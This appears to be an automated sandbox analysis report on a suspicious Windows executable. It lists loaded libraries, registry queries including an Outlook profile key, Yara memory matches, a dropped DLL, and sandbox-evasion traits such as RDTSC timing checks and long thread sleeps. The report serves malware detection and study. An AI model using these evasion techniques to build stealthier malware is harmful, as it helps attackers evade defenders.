            Source: ________.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\________.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\________.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: ________.exeVirustotal: Detection: 8%
            Source: C:\Users\user\Desktop\________.exeFile read: C:\Users\user\Desktop\________.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\________.exe "C:\Users\user\Desktop\________.exe"
            Source: C:\Users\user\Desktop\________.exeProcess created: C:\Users\user\Desktop\________.exe "C:\Users\user\Desktop\________.exe"
            Source: C:\Users\user\Desktop\________.exeProcess created: C:\Users\user\Desktop\________.exe "C:\Users\user\Desktop\________.exe"Jump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\________.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: Process Memory Space: ________.exe PID: 2916, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000002.1623677806.000000000330D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00406254
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_10002DA0 push eax; ret 1_2_10002DCE
            Source: C:\Users\user\Desktop\________.exeCode function: 3_3_0019CA98 pushfd ; retf 0019h3_3_0019CA99
            Source: C:\Users\user\Desktop\________.exeCode function: 3_3_0019EE18 push eax; iretd 3_3_0019EE65
            Source: C:\Users\user\Desktop\________.exeCode function: 3_3_0019EE8C push eax; iretd 3_3_0019EEA9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_3_0019CF4C push eax; iretd 3_3_0019CF4D
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015735D pushfd ; iretd 3_2_00157362
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4942D push edi; ret 3_2_32D4942E
            Source: C:\Users\user\Desktop\________.exeFile created: C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\________.exeAPI/Special instruction interceptor: Address: 38943CF
            Source: C:\Users\user\Desktop\________.exeAPI/Special instruction interceptor: Address: 1D443CF
            Source: C:\Users\user\Desktop\________.exeRDTSC instruction interceptor: First address: 382DDF5 second address: 382DDF5 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F40AC74A083h 0x00000006 cmp al, cl 0x00000008 inc ebp 0x00000009 push edi 0x0000000a mov edi, 43D81CFAh 0x0000000f cmp edi, 000000C9h 0x00000015 jl 00007F40AC7B2217h 0x0000001b pop edi 0x0000001c inc ebx 0x0000001d cmp al, cl 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\________.exeRDTSC instruction interceptor: First address: 1CDDDF5 second address: 1CDDDF5 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F40AD0784A3h 0x00000006 cmp al, cl 0x00000008 inc ebp 0x00000009 push edi 0x0000000a mov edi, 43D81CFAh 0x0000000f cmp edi, 000000C9h 0x00000015 jl 00007F40AD0E0637h 0x0000001b pop edi 0x0000001c inc ebx 0x0000001d cmp al, cl 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\________.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\________.exeMemory allocated: 32D60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\________.exeMemory allocated: 32AE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599187Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598968Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598640Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598421Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597874Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597327Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597203Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597093Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596765Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596546Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596328Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596203Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596093Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595984Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595874Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595765Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595546Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595210Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594781Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594671Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594562Jump to behavior
            Source: C:\Users\user\Desktop\________.exeWindow / User API: threadDelayed 8536Jump to behavior
            Source: C:\Users\user\Desktop\________.exeWindow / User API: threadDelayed 1318Jump to behavior
            Source: C:\Users\user\Desktop\________.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\________.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -24903104499507879s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1468Thread sleep count: 8536 > 30Jump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1468Thread sleep count: 1318 > 30Jump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -599312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -599187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -599078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -598968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -598859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -598750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -598640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -598421s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -598312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -598093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -597984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -597874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -597765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -597656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -597546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -597437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -597327s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -597203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -597093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -596984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -596875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -596765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -596656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -596546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -596437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -596328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -596203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -596093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -595984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -595874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -595765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -595656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -595546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -595437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -595328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -595210s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -595109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -595000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -594890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -594781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -594671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exe TID: 1936Thread sleep time: -594562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405772
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_0040622D FindFirstFileW,FindClose,1_2_0040622D
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_00402770 FindFirstFileW,1_2_00402770
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_00402770 FindFirstFileW,3_2_00402770
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405772
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0040622D FindFirstFileW,FindClose,3_2_0040622D
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599187Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598968Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598640Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598421Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597874Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597327Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597203Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 597093Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596765Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596546Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596328Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596203Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 596093Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595984Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595874Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595765Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595546Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595210Jump to behavior
